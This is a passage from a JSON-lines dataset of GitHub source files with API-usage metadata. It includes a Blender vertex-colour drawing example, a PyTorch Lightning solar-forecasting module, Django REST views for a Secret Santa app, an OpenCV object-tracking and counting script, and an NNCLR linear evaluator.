"line_number": 70, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 72, "usage_type": "call"}, {"api_name": "Droso.views.eyedimen", "line_number": 72, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 72, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 73, "usage_type": "call"}, {"api_name": "Droso.views.eyedimen2", "line_number": 73, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 73, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 74, "usage_type": "call"}, {"api_name": "Droso.views.e_dimen_out", "line_number": 74, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 74, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 77, "usage_type": "call"}, {"api_name": "Droso.views.wing_dashboard", "line_number": 77, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 77, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 78, "usage_type": "call"}, {"api_name": "Droso.views.eye_dashboard", "line_number": 78, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 78, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 81, "usage_type": "call"}, {"api_name": "Droso.views.ring_assay_1", "line_number": 81, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 81, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 82, "usage_type": "call"}, {"api_name": "Droso.views.ring_assay_2", "line_number": 82, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 82, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 83, "usage_type": "call"}, {"api_name": "Droso.views.ring_out", "line_number": 83, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 83, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 98, "usage_type": "call"}, {"api_name": "Droso.views.generate_pdf_view", "line_number": 98, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 98, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 99, "usage_type": "call"}, {"api_name": "Droso.views.dowdata", "line_number": 99, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 99, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 100, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 100, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 100, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 100, "usage_type": "attribute"}, {"api_name": "django.conf.settings.DEBUG", "line_number": 102, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 102, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 103, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 103, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 103, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 103, "usage_type": "attribute"}]} +{"seq_id": "15843899839", "text": "\"\"\"\nMesh with Random Vertex Colors\n------------------------------\n\"\"\"\nimport bpy\nimport gpu\nimport numpy as np\nfrom random import random\nfrom gpu_extras.batch import batch_for_shader\n\nmesh = bpy.context.active_object.data\nmesh.calc_loop_triangles()\n\nvertices = np.empty((len(mesh.vertices), 3), 'f')\nindices = np.empty((len(mesh.loop_triangles), 3), 'i')\n\nmesh.vertices.foreach_get(\n \"co\", np.reshape(vertices, len(mesh.vertices) * 3))\nmesh.loop_triangles.foreach_get(\n \"vertices\", np.reshape(indices, len(mesh.loop_triangles) * 3))\n\nvertex_colors = [(random(), random(), random(), 1) for _ in range(len(mesh.vertices))]\n\nshader = gpu.shader.from_builtin('SMOOTH_COLOR')\nbatch = batch_for_shader(\n shader, 'TRIS',\n {\"pos\": vertices, \"color\": vertex_colors},\n indices=indices,\n)\n\n\ndef draw():\n gpu.state.depth_test_set('LESS_EQUAL')\n gpu.state.depth_mask_set(True)\n batch.draw(shader)\n gpu.state.depth_mask_set(False)\n\n\nbpy.types.SpaceView3D.draw_handler_add(draw, (), 'WINDOW', 'POST_VIEW')\n", "repo_name": "blender/blender", "sub_path": "doc/python_api/examples/gpu.4.py", "file_name": "gpu.4.py", "file_ext": "py", "file_size_in_byte": 1018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10105, "dataset": "github-code", "pt": "61", "api": [{"api_name": "bpy.context", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.empty", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 20, "usage_type": "call"}, {"api_name": "random.random", "line_number": 22, "usage_type": "call"}, {"api_name": "gpu.shader.from_builtin", "line_number": 24, "usage_type": "call"}, {"api_name": "gpu.shader", "line_number": 24, "usage_type": "attribute"}, {"api_name": "gpu_extras.batch.batch_for_shader", "line_number": 25, "usage_type": "call"}, {"api_name": "gpu.state.depth_test_set", "line_number": 33, "usage_type": "call"}, {"api_name": "gpu.state", "line_number": 33, "usage_type": "attribute"}, {"api_name": "gpu.state.depth_mask_set", "line_number": 34, "usage_type": "call"}, {"api_name": "gpu.state", "line_number": 34, "usage_type": "attribute"}, {"api_name": "gpu.state.depth_mask_set", "line_number": 36, "usage_type": "call"}, {"api_name": "gpu.state", "line_number": 36, "usage_type": "attribute"}, {"api_name": "bpy.types.SpaceView3D.draw_handler_add", "line_number": 39, "usage_type": "call"}, {"api_name": "bpy.types", "line_number": 39, "usage_type": "attribute"}]} +{"seq_id": "28535180025", "text": "\"\"\"\nCommon code for running pytorch lightning modules in the solpred project\n\"\"\"\n\n\n# Imports\nfrom pathlib import Path\nfrom argparse import ArgumentParser\nimport datetime\nimport json\n\nimport torch.nn.functional as F\nimport pytorch_lightning as pl\nimport pandas as pd\n\nfrom solpreddatamodule import SolpredDataModule\n\nclass SolpredModule(pl.LightningModule):\n @staticmethod\n def add_model_specific_args(parent_parser):\n parser = ArgumentParser(parents=[parent_parser], add_help=False)\n parser.add_argument('--input_terms', type=int, required=True)\n parser.add_argument('--model_name', type=str, required=True)\n parser.add_argument('--learning_rate', type=float, required=True)\n return parser\n\n def __init__(self, args):\n super().__init__()\n self.model_name = args.model_name\n self.batch_size = args.batch_size\n self.learning_rate = args.learning_rate\n self.test_results = []\n self.save_hyperparameters()\n\n def training_step(self, batch, batch_idx):\n img, in_data, target, diffuse_direct_irradiance, most_recent_clear_sky, target_clear_sky, json_data = batch\n pred = self(img, in_data, diffuse_direct_irradiance, most_recent_clear_sky, target_clear_sky)\n loss = F.mse_loss(pred, target)\n return loss\n\n def validation_step(self, batch, batch_idx):\n img, in_data, target, diffuse_direct_irradiance, most_recent_clear_sky, target_clear_sky, json_data = batch\n pred = self(img, in_data, diffuse_direct_irradiance, most_recent_clear_sky, target_clear_sky)\n loss = F.mse_loss(pred, target)\n self.log(\"val_loss\", loss, batch_size=self.batch_size)\n return loss\n\n def test_step(self, batch, batch_idx):\n img, in_data, target, diffuse_direct_irradiance, most_recent_clear_sky, target_clear_sky, json_data = batch\n pred = self(img, in_data, diffuse_direct_irradiance, most_recent_clear_sky, target_clear_sky)\n loss = F.mse_loss(pred, target)\n self.log(\"test_loss\", loss, batch_size=1)\n ghi_label = \"globalcmp11physical\" if \"globalcmp11physical\" in json_data[0][\"inputs\"][0] else \"value\"\n for i, d in enumerate(json_data):\n # Looping through each element in the batch\n time = d[\"id\"] # Time is defined by id - typically when the prediction was made\n result = {\"actual\": target[i].item(), # The value we were trying to predict\n self.model_name + \"_pred\": pred[i].item(), # the prediction from our model\n \"persist_pred\": json_data[i][\"inputs\"][0][ghi_label]} # Taking the most recent observed value as persistence\n for key, value in result.items():\n # For each series in result\n self.test_results.append(\n {\"time\": time,\n \"series\": key,\n \"value\": value})\n #step_df = pd.DataFrame(step_results, columns=[\"time\", \"series\", \"value\"])\n #step_df.set_index(\"time\") # I think we throw away the index at csv export anyway\n return loss\n\n def export_test_csv(self, output_path):\n pd.DataFrame(self.test_results, columns=[\"time\", \"series\", \"value\"]).to_csv(output_path, index=False)\n #pd.concat(self.test_results, axis=\"index\", ignore_index=True).to_csv(output_path, index=False)\n\n\ndef make_callbacks(args):\n x = [\n pl.callbacks.EarlyStopping(\n monitor=\"val_loss\",\n patience=args.stopping_patience,\n min_delta=0.0,\n strict=True,\n verbose=True,\n mode=\"min\",\n ),\n pl.callbacks.ModelCheckpoint(\n save_top_k=1,\n verbose=True,\n monitor=\"val_loss\",\n filename=args.model_name + \"_{epoch:02d}_{val_loss:.2f}\",\n mode=\"min\",\n ),\n pl.callbacks.ModelCheckpoint(\n save_top_k=1,\n monitor=\"val_loss\",\n mode=\"min\",\n dirpath=\"./\",\n filename=\"latest_best\",\n ),\n ]\n if args.use_stochastic_weight_averaging:\n x = x.append(pl.callbacks.StochasticWeightAveraging(swa_epoch_start=2))\n return x\n\ndef test_phase(model, trainer, data, test_output):\n with open(\"started_testing.json\", \"w\") as f:\n print(\"Starting Testing\")\n json.dump({\"start_time\": str(datetime.datetime.now())}, f)\n trainer.test(model, datamodule=data)\n print(\"exporting\")\n model.export_test_csv(test_output)\n\ndef main(args, model):\n data = SolpredDataModule(args)\n if args.visualise:\n print(\"Visualising\")\n data.setup()\n model.visualise_activations(data.test_dataloader())\n else:\n trainer = pl.Trainer.from_argparse_args(args, callbacks=make_callbacks(args))\n # Run Train\n if not args.test:\n if args.load_checkpoint and args.resume_train:\n print(\"Loaded checkpoint weights and training state\")\n trainer.fit(model, data, ckpt_path=args.load_checkpoint)\n elif args.load_checkpoint:\n print(\"Loaded checkpoint weights but not training state\")\n trainer.fit(model, data)\n else:\n print(\"No previous checkpoint data was loaded\")\n trainer.fit(model, data)\n else:\n print(\"Skipping Training\")\n # Run Test\n test_phase(model, trainer, data, args.test_output)\n print(\"Main Done\")\n\n\ndef make_parser():\n parser = ArgumentParser()\n # add PROGRAM level args\n parser.add_argument('--load_checkpoint', type=Path, help=\"Load checkpoint from path\")\n parser.add_argument('--resume_train', action='store_true', help=\"Restore training status from checkpoint\")\n parser.add_argument('--visualise', action='store_true', help=\"Only run visualise_activations, no training\")\n parser.add_argument('--test', action='store_true', help=\"Only run inference, no training\")\n parser.add_argument('--test_output', type=str, default='test_out.csv.gz')\n parser.add_argument('--stopping_patience', type=int, default=10, help=\"Early Stopping Patience\")\n parser.add_argument('--use_stochastic_weight_averaging', action='store_true', help=\"Run with SWA turned on\")\n return parser\n\nif __name__ == '__main__':\n print(\"This is only common code, this module is meant to be imported\")\n", "repo_name": "wongjoel/Solpred", "sub_path": "resources/scripts/solpred_common.py", "file_name": "solpred_common.py", "file_ext": "py", "file_size_in_byte": 6362, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pytorch_lightning.LightningModule", "line_number": 18, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn.functional.mse_loss", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.nn.functional.mse_loss", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.nn.functional.mse_loss", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 51, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 71, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks.EarlyStopping", "line_number": 77, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.callbacks.ModelCheckpoint", "line_number": 85, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.callbacks.ModelCheckpoint", "line_number": 92, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pytorch_lightning.callbacks.StochasticWeightAveraging", "line_number": 101, "usage_type": "call"}, {"api_name": "pytorch_lightning.callbacks", "line_number": 101, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 107, "usage_type": "attribute"}, {"api_name": "solpreddatamodule.SolpredDataModule", "line_number": 113, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer.from_argparse_args", "line_number": 119, "usage_type": "call"}, {"api_name": "pytorch_lightning.Trainer", "line_number": 119, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 139, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 141, "usage_type": "name"}]} +{"seq_id": "25789556138", "text": "from random import randint, shuffle\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views.decorators.http import require_POST\n\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import ValidationError\nfrom .models import Group, Participant\nfrom .serializers import GroupSerializer, GroupShortSerializer, ParticipantSerializer\n\n\nclass GroupViewSet(viewsets.ViewSet):\n\n def create(self, request):\n serializer = GroupSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n group = serializer.save()\n return Response(group.id, status=201)\n\n def list(self, request):\n groups = Group.objects.all()\n return Response(GroupShortSerializer(groups, many=True).data)\n\n def retrieve(self, request, group_id):\n group = get_object_or_404(Group, id=group_id)\n return Response(GroupSerializer(group).data)\n\n def update(self, request, group_id):\n serializer = GroupSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n group = get_object_or_404(Group, id=group_id)\n group = serializer.update(group, serializer.validated_data)\n return Response(GroupSerializer(group).data, status=204)\n\n def destroy(self, request, group_id):\n group = get_object_or_404(Group, id=group_id)\n deleted_group_id = group.id\n group.delete()\n return Response(deleted_group_id, status=204)\n\n# [\n# {\n# \"id\": 1,\n# \"name\": \"string\",\n# \"description\": \"string\"\n# }\n# ]\n\n# {\n# \"name\": \"string\",\n# \"description\": \"string\"\n# }\n\n# {\n# \"name\": \"string\",\n# \"wish\": \"string\"\n# }\n\n\nclass ParticipantViewSet(viewsets.ViewSet):\n\n def create(self, request, group_id):\n serializer = ParticipantSerializer(data=request.data, context={'group_id': group_id})\n serializer.is_valid(raise_exception=True)\n participant = serializer.save()\n return Response(participant.id, status=201)\n\n def destroy(self, request, group_id, participant_id):\n participant = get_object_or_404(Participant, id=participant_id, group_id=group_id)\n deleted_participant_id = participant.id\n participant.delete()\n return Response(deleted_participant_id, status=204)\n\n\nclass ShuffleViewSet(viewsets.ViewSet):\n\n def toss(self, request, group_id):\n\n participants = Participant.objects.filter(group_id=group_id)\n initial = [participant for participant in participants]\n if len(initial) < 3:\n raise ValidationError('Group must have 3 or more participants for toss')\n shuffle(initial)\n rotation = randint(1, len(initial) - 1)\n rotated = initial[rotation:] + initial[:rotation]\n\n for part, rec in zip(initial, rotated):\n part.recipient = rec\n part.save()\n data = ParticipantSerializer(participants, many=True).data\n return Response(data, status=204)\n", "repo_name": "reatlaz/santa", "sub_path": "groups/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3006, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.viewsets.ViewSet", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 13, "usage_type": "name"}, {"api_name": "serializers.GroupSerializer", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 19, "usage_type": "call"}, {"api_name": "models.Group.objects.all", "line_number": 22, "usage_type": "call"}, {"api_name": "models.Group.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "models.Group", "line_number": 22, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 23, "usage_type": "call"}, {"api_name": "serializers.GroupShortSerializer", "line_number": 23, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Group", "line_number": 26, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 27, "usage_type": "call"}, {"api_name": "serializers.GroupSerializer", "line_number": 27, "usage_type": "call"}, {"api_name": "serializers.GroupSerializer", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 32, "usage_type": "call"}, {"api_name": "models.Group", "line_number": 32, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 34, "usage_type": "call"}, {"api_name": "serializers.GroupSerializer", "line_number": 34, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Group", "line_number": 37, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 40, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ViewSet", "line_number": 61, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 61, "usage_type": "name"}, {"api_name": "serializers.ParticipantSerializer", "line_number": 64, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 67, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 70, "usage_type": "call"}, {"api_name": "models.Participant", "line_number": 70, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ViewSet", "line_number": 76, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 76, "usage_type": "name"}, {"api_name": "models.Participant.objects.filter", "line_number": 80, "usage_type": "call"}, {"api_name": "models.Participant.objects", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.Participant", "line_number": 80, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 83, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 84, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 85, "usage_type": "call"}, {"api_name": "serializers.ParticipantSerializer", "line_number": 91, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "29057316966", "text": "import copy\nimport time\nimport argparse\n\nimport cv2,math\nfrom pathlib import Path\n\nfrom Detector.detector import ObjectDetector\nfrom Tracker.tracker import MultiObjectTracker\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--device\", type=int, default=0)\n parser.add_argument(\"--movie\", type=str, default='videos/tomato2.mp4')\n\n parser.add_argument(\n '--detector',\n choices=[\n 'yolox_n',\n 'yolox_s',\n 'yolox_m',\n 'yolo_tgi_n',\n 'yolo_tgi_s',\n 'yolo_tgi_m',\n 'nanodet_n',\n 'nanodet_s',\n 'nanodet_m',\n\n ],\n default='yolo_tgi_s',\n )\n parser.add_argument(\n '--tracker',\n choices=[\n 'motpy',\n 'mc_bytetrack',\n 'mc_norfair',\n ],\n default='mc_bytetrack',\n )\n\n parser.add_argument(\"--target_id\", type=str, default='2')\n\n parser.add_argument('--use_gpu', action='store_true')\n\n args = parser.parse_args()\n\n return args\n\n\ndef main():\n args = get_args()\n\n cap_device = args.device\n if args.movie is not None:\n cap_device = args.movie\n\n detector_name = args.detector\n tracker_name = args.tracker\n\n target_id = args.target_id\n if target_id is not None:\n target_id = [int(i) for i in target_id.split(',')]\n\n use_gpu = args.use_gpu\n\n # Video ini\n cap = cv2.VideoCapture(cap_device)\n cap_fps = cap.get(cv2.CAP_PROP_FPS) ###fps\n # Object Detection loading Detect model\n detector = ObjectDetector(\n detector_name,\n target_id,\n use_gpu=use_gpu,\n )\n # detector.print_info()\n\n # Multi Object Tracking loading tracking model\n tracker = MultiObjectTracker(\n tracker_name,\n cap_fps,\n use_gpu=use_gpu,\n )\n # tracker.print_info()\n track_id_dict = {}\n filtered_ids_dict={}\n id_no = 0\n center_tracks={}\n save_path = 'demo'\n N, img = cap.read()\n fps, w, h = cap_fps, img.shape[1], img.shape[0]\n save_path = str(Path(save_path).with_suffix('.mp4')) # force *.mp4 suffix on results videos\n vid_writer = cv2.VideoWriter(save_path, cv2.VideoWriter_fourcc(*'mp4v'), fps, (w, h))\n while True:\n start_time = time.time()\n ret, frame = cap.read()\n if not ret:\n break\n #frame=cv2.flip(cv2.transpose(frame), 0)\n debug_image = copy.deepcopy(frame)\n\n frame_h,frame_w,_=debug_image.shape\n x_min=int(frame_w/2-250)\n x_max=int(frame_w/2+250)\n #print('h',frame_h,'w',frame_w)\n\n d_bboxes, d_scores, d_class_ids = detector(frame) ###获得(bbox,scores,class_id)\n # Multi Object Tracking\n track_ids, t_bboxes, t_scores, t_class_ids = tracker(\n frame,\n d_bboxes,\n d_scores,\n d_class_ids,\n )\n\n #print('track_ids',track_ids,len(track_ids))\n t,filtered_id_dict= total_count(track_ids, t_bboxes, x_min,x_max,id_no,filtered_ids_dict)\n #print('filtered_id_dict',filtered_id_dict)\n total_numbers = len(filtered_id_dict)\n\n\n # link track_id\n for track_id in track_ids:\n if track_id not in track_id_dict:\n new_id = len(track_id_dict)\n track_id_dict[track_id] = new_id\n\n #print('track_id_dict)',track_id_dict,len(track_id_dict))\n\n elapsed_time = time.time() - start_time\n\n debug_image = draw_debug_info(\n debug_image,\n elapsed_time,\n track_ids,\n t_bboxes,\n t_scores,\n t_class_ids,\n track_id_dict,\n #filtered_id_dict,\n total_numbers,\n x_min,\n x_max,\n frame_h,\n center_tracks\n )\n\n key = cv2.waitKey(1)\n if key == 27: # ESC\n break\n cv2.imshow('Detection and tracking', debug_image)\n vid_writer.write(debug_image)\n vid_writer.release()\n # cap.release()\n # cv2.destroyAllWindows()\n\ndef get_id_color(index):\n #temp_index = abs(int(index + 1)) * 3\n if index == 1:\n color=(0,255,0)\n elif index == 2:\n color=(255,0,0)\n elif index ==3 :\n color=(255,255,0)\n text_color_bgr = tuple(reversed(color))\n return text_color_bgr\n\ndef total_count(track_ids, bboxes, x_min,x_max,id_no,filtered_ids_dict):\n for i in range(len(bboxes)):\n x1, y1, x2, y2= bboxes[i]\n # 撞线检测点,(x1,y1),x方向偏移比例 0.0~1.0\n x_center= int(x1 + ((x2 - x1) * 0.5))\n # 撞线的点\n x = x_center\n if x > x_min and x < x_max:\n if track_ids[i] not in filtered_ids_dict:\n filtered_ids_dict[track_ids[i]]=id_no\n id_no += 1\n # elif track_ids[i] in filtered_ids_dict:\n # filtered_ids_dict.remove(track_ids[i])\n\n return (id_no,filtered_ids_dict)\n #return(filtered_ids_dict,bboxes_dict,scores_dict,class_ids_dict,count_no)\n\ndef distance(point1, point2):\n return math.sqrt((point1[0] - point2[0]) ** 2 + (point1[1] - point2[1]) ** 2)\n\n\n\ndef draw_debug_info(\n debug_image,\n elapsed_time,\n track_ids,\n bboxes,\n scores,\n class_ids,\n track_id_dict,\n count_no,\n x_min,\n x_max,\n frame_h,\n center_tracks,\n\n):\n #for id, bbox, score, class_id in zip(track_ids, bboxes, scores, class_ids):\n ####filter here\n data= zip(track_ids, bboxes, scores, class_ids)\n print('class_ids:',class_ids)\n # data_sorted=sorted(data, key=lambda x: x[1][0],reverse=True)\n #print(bboxes)\n for id, bbox, score, class_id in data:\n\n x1, y1, x2, y2 = int(bbox[0]), int(bbox[1]), int(bbox[2]), int(bbox[3])\n class_id=int(class_id)\n #color = get_id_color(track_id_dict[id])\n print('class_id:'+str(class_id))\n color = get_id_color(class_id)\n # color = get_id_color(2)\n debug_image = cv2.rectangle(\n debug_image,\n (x1, y1),\n (x2, y2),\n color,\n thickness=3,\n )\n\n center = (int((x1 + x2) / 2), int((y1+y2) / 2)) # BBox中心点\n debug_image=cv2.circle(debug_image,center, 2, (0, 255, 0), -1)\n if id not in center_tracks:\n center_tracks[id]=[]\n center_tracks[id].append(center)\n # 定义距离阈值绘制轨迹\n distance_threshold = 50\n #for i in range(1, len(center_tracks[id])):\n #if distance(center_tracks[id][i - 1], center_tracks[id][i]) < distance_threshold:\n # 绘制轨迹线\n # cv2.line(debug_image, center_tracks[id][i - 1], center_tracks[id][i], (0, 0, 255), 3)\n #score = '%.2f' % score\n #text = 'TID:%s(%s)' % (str(int(track_id_dict[id])), str(score))\n #text = 'TID:%s(%s)' % (str(int(2)), str(score))\n #debug_image = cv2.putText(debug_image,text,(x1, y1 - 22),cv2.FONT_HERSHEY_SIMPLEX,0.5,color,thickness=3)\n ###video save\n\n\n # text = 'CID:%s' % (str(int(class_id)))\n #debug_image = cv2.putText( debug_image,text,(x1, y1 - 8),cv2.FONT_HERSHEY_SIMPLEX,0.5,color,thickness=3)\n\n # inference time\n cv2.putText(debug_image,\"Elapsed Time : \" + '{:.1f}'.format(elapsed_time * 1000) + \"ms\",(10, 30),cv2.FONT_HERSHEY_SIMPLEX,0.7,\n (0, 255, 0),\n 2,\n cv2.LINE_AA,\n )\n\n cv2.putText(\n debug_image,\n \"Total numbers : \" + '{:.1f}'.format(count_no) ,\n (10, 60),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.7,\n (0, 255, 0),\n 2,\n cv2.LINE_AA,\n )\n cv2.line(debug_image, (x_min, 0), (x_min, frame_h), (0, 255, 255), 10)\n cv2.line(debug_image, (x_max, 0), (x_max, frame_h), (0, 255, 255), 10)\n\n return debug_image\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "RuiKangnj/TGI", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7833, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 70, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FPS", "line_number": 71, "usage_type": "attribute"}, {"api_name": "Detector.detector.ObjectDetector", "line_number": 73, "usage_type": "call"}, {"api_name": "Tracker.tracker.MultiObjectTracker", "line_number": 81, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 94, "usage_type": "call"}, {"api_name": "cv2.VideoWriter", "line_number": 95, "usage_type": "call"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 95, "usage_type": "call"}, {"api_name": "time.time", "line_number": 97, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 102, "usage_type": "call"}, {"api_name": "time.time", "line_number": 132, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 153, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 188, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 221, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 230, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 251, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 251, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 254, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 257, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 261, "usage_type": "attribute"}, {"api_name": "cv2.LINE_AA", "line_number": 265, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 267, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 268, "usage_type": "call"}]} +{"seq_id": "37105907253", "text": "import torch\nfrom torch import nn\nfrom torchvision import models\n\nclass LinearEvaluatorModel(nn.Module):\n def __init__(self, num_classes=100) -> None:\n super().__init__()\n resnet18 = models.resnet18()\n resnet18.conv1 = nn.Conv2d(\n 3, 64, kernel_size=3, stride=1, padding=2, bias=False\n )\n resnet18.maxpool = nn.Identity()\n self.backbone = nn.Sequential(*list(resnet18.children())[:-1])\n for param in self.backbone.parameters():\n param.requires_grad = False\n \n hidden_size = resnet18.fc.in_features\n self.classifier = nn.Linear(hidden_size, num_classes)\n self.criterion = nn.CrossEntropyLoss()\n \n def train(self, mode=True):\n super().train(mode)\n self.backbone.eval()\n \n def forward(self, x, labels=None):\n with torch.no_grad():\n feats = self.backbone(x).squeeze()\n logits = self.classifier(feats)\n out = (logits, )\n if labels is not None:\n loss = self.criterion(logits, labels)\n out += (loss, )\n\n return out", "repo_name": "mwritescode/nnclr-cifar100", "sub_path": "src/models/evaluator.py", "file_name": "evaluator.py", "file_ext": "py", "file_size_in_byte": 1119, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.nn.Module", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 5, "usage_type": "name"}, {"api_name": "torchvision.models.resnet18", "line_number": 8, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 8, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Identity", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "18803798233", "text": "import lib.find as f\nimport time\nfrom loguru import logger\nimport lib.adb_command as 